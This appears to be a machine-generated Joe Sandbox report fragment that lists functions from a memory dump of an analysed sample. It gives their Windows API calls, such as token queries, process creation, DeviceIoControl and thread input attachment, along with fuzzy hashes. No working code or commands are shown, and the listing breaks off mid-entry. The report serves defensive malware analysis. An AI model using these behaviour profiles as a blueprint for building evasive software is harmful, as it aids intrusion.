                                                                        • Instruction ID: 7e172fa8428bf61b45a340a8bfcf004d3f68e1dbb3ac24d0b70fd6db0c02962a
                                                                        • Opcode Fuzzy Hash: b84a1c62242a54d3bac58912e301293e6522e590f3d0cc02a9a2c4177c9f3f91
                                                                        • Instruction Fuzzy Hash: 9B113632509212AFCF313F74AC4466A7FE5AF4E364F216429FA88BE151CB30DC409690
                                                                        Function 00E8EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E8EBB2
                                                                          • Part of subcall function 00E751AF: _memset.LIBCMT ref: 00E7522F
                                                                          • Part of subcall function 00E751AF: _wcscpy.LIBCMT ref: 00E75283
                                                                          • Part of subcall function 00E751AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E75293
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00E8EC07
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8EC16
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE3C88
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: fb8721dca0869c8083fadcbc2c31f71998063ca058843f925c8aa5866cf017b8
                                                                        • Instruction ID: 1872527c5032818059fde0b1ac77071d7d627ec84fef344ad24f699b9958c56d
                                                                        • Opcode Fuzzy Hash: fb8721dca0869c8083fadcbc2c31f71998063ca058843f925c8aa5866cf017b8
                                                                        • Instruction Fuzzy Hash: 5221B3709047D8AFE7329B388C59BEAFBED9B41308F14148DE69E77281C3746A84CB51
                                                                        Function 00EB058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EB05AC
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EB05C7
                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EB05DD
                                                                        • FreeLibrary.KERNEL32(?), ref: 00EB0632
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                        • String ID:
                                                                        • API String ID: 3137044355-0
                                                                        • Opcode ID: 24a054d2dbe09fff00d3c009df510c0b8b8848b5e1eb0e0c6f7a5766a61c587b
                                                                        • Instruction ID: 987b9999edb3099c4777f247084ea5089a9c00e7736b8f8000ad601e547a7224
                                                                        • Opcode Fuzzy Hash: 24a054d2dbe09fff00d3c009df510c0b8b8848b5e1eb0e0c6f7a5766a61c587b
                                                                        • Instruction Fuzzy Hash: F1217F71901209EFDB209F96DC88AEBBBB8EF80704F0094A9E556B2454D770FA59DF50
                                                                        Function 00EB6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EB6733
                                                                        • _memset.LIBCMT ref: 00EB6754
                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EB67A6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB67AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                        • String ID:
                                                                        • API String ID: 1157408455-0
                                                                        • Opcode ID: 4c5459563bae16e1b375aae62928efea594c68173405f6258d503d4a296f94fc
                                                                        • Instruction ID: 632357667e0a76fdaece86546c4fbeac2f4fd7115da0706a703f2e31d83c279d
                                                                        • Opcode Fuzzy Hash: 4c5459563bae16e1b375aae62928efea594c68173405f6258d503d4a296f94fc
                                                                        • Instruction Fuzzy Hash: 8B11A3769012287BE7209BA5AC4DFEFBABCEF44764F10419AF504F7190D6744E84CBA4
                                                                        Function 00EAB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
                                                                          • Part of subcall function 00EAAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EAAA83
                                                                          • Part of subcall function 00EAAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EAAA92
                                                                          • Part of subcall function 00EAAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EAAA99
                                                                          • Part of subcall function 00EAAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EAAAAF
                                                                        • GetLengthSid.ADVAPI32(?,00000000,00EAADE4,?,?), ref: 00EAB21B
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EAB227
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00EAB22E
                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00EAB247
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                        • String ID:
                                                                        • API String ID: 4217664535-0
                                                                        • Opcode ID: 45414ca4a9f9148243220654397953ae93002c29a39ab28f9f0648695cef7c41
                                                                        • Instruction ID: 4ecb1fe03547493dad501828f5a3517d1cc2a875f313fd603b90d893c1c015b3
                                                                        • Opcode Fuzzy Hash: 45414ca4a9f9148243220654397953ae93002c29a39ab28f9f0648695cef7c41
                                                                        • Instruction Fuzzy Hash: 19118671900205AFDB149F54DC45BBFB7A9EF8A308B14502EE546EB221D735AE44CB20
                                                                        Function 00EAB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EAB498
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4AA
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4C0
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 4730aaa8016f8ec1fcd5a14060a854fd97d16954ddcd74013858fbd3229045df
                                                                        • Instruction ID: a678072f4ebae1683abae34b5b423491d16102d14450272075724cc72daa1e63
                                                                        • Opcode Fuzzy Hash: 4730aaa8016f8ec1fcd5a14060a854fd97d16954ddcd74013858fbd3229045df
                                                                        • Instruction Fuzzy Hash: 4B11367A900218BFDB11DBA9C881E9DBBB4FB09710F204091E614BB291D771AE10DB94
                                                                        Function 00E8B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E8B5A5
                                                                        • GetClientRect.USER32(?,?), ref: 00EEE69A
                                                                        • GetCursorPos.USER32(?), ref: 00EEE6A4
                                                                        • ScreenToClient.USER32(?,?), ref: 00EEE6AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: 5fe6f767a69c34f12a0743ee21e40312c61dadc31472c8027ca86e53013e2549
                                                                        • Instruction ID: f74bc0b5b1409bb030dc148f74abec3c8f002ce0767c06372910815751e60ca7
                                                                        • Opcode Fuzzy Hash: 5fe6f767a69c34f12a0743ee21e40312c61dadc31472c8027ca86e53013e2549
                                                                        • Instruction Fuzzy Hash: 0111363190002ABFCB10EF95DC469FE7BBAEB49308F101451E909F7240D330AA86CBA5
                                                                        Function 00EB732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB7352
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00EB7385
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EB739B
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EB73A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 3240737a36dcf609c383eaa42b3f3abd2426365f94e2b5cbf0fd88585846a517
                                                                        • Instruction ID: 04b6ae8660e04fc0b94cada821177aee9e60123806d51b6ddd6187b868af8595
                                                                        • Opcode Fuzzy Hash: 3240737a36dcf609c383eaa42b3f3abd2426365f94e2b5cbf0fd88585846a517
                                                                        • Instruction Fuzzy Hash: 5911E572A08208AFCB01DB699C05AEF7FEE9B85324F044255F921F3261D670C90497A0
                                                                        Function 00E8D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                        • GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: d0ad5d7466bc3da6cc89186e1e52a906d7fb1cd1b2275b7f00a3d26bb3628562
                                                                        • Instruction ID: 60598b109f9528b38583c5ef1e4438968aacc1bdb0c3e4b533bcc1c49067e722
                                                                        • Opcode Fuzzy Hash: d0ad5d7466bc3da6cc89186e1e52a906d7fb1cd1b2275b7f00a3d26bb3628562
                                                                        • Instruction Fuzzy Hash: AA11A57210650DBFEB015F919C58EEABF6EFF48364F041101FA0961190C7319C50DB90
                                                                        Function 00EA4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction ID: 62f82703a9af62c15b3c5b61eec1972319c54d98ea52f385c7a556d267708e43
                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                        • Instruction Fuzzy Hash: DB0178B200014EBBCF125E84DC018EE3F62BB5E354B489415FA286D070D376EAB2AB81
                                                                        Function 00E97452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E97A0D: __getptd_noexit.LIBCMT ref: 00E97A0E
                                                                        • __lock.LIBCMT ref: 00E9748F
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00E974AC
                                                                        • _free.LIBCMT ref: 00E974BF
                                                                        • InterlockedIncrement.KERNEL32(015D3618), ref: 00E974D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 2704283638-0
                                                                        • Opcode ID: f4c1dc7d97c1eb0abf56b318a24048897792ad24606608183cd74abe97ca57b3
                                                                        • Instruction ID: 63286bb5505f94ee9bd5204ee83dda5171dd7483aa26d0bd44df4233e7781f89
                                                                        • Opcode Fuzzy Hash: f4c1dc7d97c1eb0abf56b318a24048897792ad24606608183cd74abe97ca57b3
                                                                        • Instruction Fuzzy Hash: 1201F93191A726ABCF21AF25A80579DBBA0BF04B14F145005F4A4B3682C7345D45DFC2
                                                                        Function 00EDE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EDE33D
                                                                        • _memset.LIBCMT ref: 00EDE34C
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F33D00,00F33D44), ref: 00EDE37B
                                                                        • CloseHandle.KERNEL32 ref: 00EDE38D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        • Opcode ID: 7f557d4beba812cf2b042e8999c97f1f3dff834ea74c1876e004368b6b8b3d80
                                                                        • Instruction ID: 49e39eb21b59535dd34f32c8ce010ac3844a61c921bd4f98a9db24e2057564c6
                                                                        • Opcode Fuzzy Hash: 7f557d4beba812cf2b042e8999c97f1f3dff834ea74c1876e004368b6b8b3d80
                                                                        • Instruction Fuzzy Hash: 62F05EF164030CBFE610AB65AC49F7B7E9DDB05764F014421BE08EA1A2D7759E00A6A8
                                                                        Function 00EDEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                          • Part of subcall function 00E8AF83: BeginPath.GDI32(?), ref: 00E8B009
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EDEA8E
                                                                        • LineTo.GDI32(00000000,?,?), ref: 00EDEA9B
                                                                        • EndPath.GDI32(00000000), ref: 00EDEAAB
                                                                        • StrokePath.GDI32(00000000), ref: 00EDEAB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        • Opcode ID: 6bca02a4ed83cd193abce8709cf9f99b89b17fc5052adad3a222213ef961a170
                                                                        • Instruction ID: 234c5b2de9e08724ae484c801c81a09f0427f935768d3322b472f1c18d19addd
                                                                        • Opcode Fuzzy Hash: 6bca02a4ed83cd193abce8709cf9f99b89b17fc5052adad3a222213ef961a170
                                                                        • Instruction Fuzzy Hash: 35F0E231009259BBDB12AF94AD0EFDE3F1BAF06320F084102FA01742E18B745516DBA5
                                                                        Function 00EAC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EAC84A
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAC85D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EAC864
                                                                        • AttachThreadInput.USER32(00000000), ref: 00EAC86B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: 6bc7ca27d9e4b93252e0c9abed775e3a535da0299f930b2f0ee4f66d1f465d6c
                                                                        • Instruction ID: 24e2125e6daeaaea667d502dedd2c26ba9757625e1ee537029b8cebceabde279
                                                                        • Opcode Fuzzy Hash: 6bc7ca27d9e4b93252e0c9abed775e3a535da0299f930b2f0ee4f66d1f465d6c
                                                                        • Instruction Fuzzy Hash: ADE06D71146228BADB211BA2DC0DFEB7F5DEF4B7A1F408021B60DE8460C6B5E584CBE0
                                                                        Function 00EAB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 00EAB0D6
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EAAC9D), ref: 00EAB0DD
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EAAC9D), ref: 00EAB0EA
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EAAC9D), ref: 00EAB0F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: 422dee145ac67458f5737ecd18584dbb5e2cd4a4d6ef7aef5d8d827d5ee3fa32
                                                                        • Instruction ID: 9d386ee473f732865eda877afdc0d8874720ce3b16b97b517a313089d1825757
                                                                        • Opcode Fuzzy Hash: 422dee145ac67458f5737ecd18584dbb5e2cd4a4d6ef7aef5d8d827d5ee3fa32
                                                                        • Instruction Fuzzy Hash: 8DE04F32605211EFD7201FB25C0CB5B3FAAEF96795F018818A241EA040DA249405C760
                                                                        Function 00E8B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00E8B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E8B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 00E8B4BD
                                                                        • GetWindowDC.USER32(?,00000000), ref: 00EEDE2B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EEDE38
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00EEDE51
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00EEDE6A
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EEDE8A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EEDE95
                                                                        Memory Dump Source
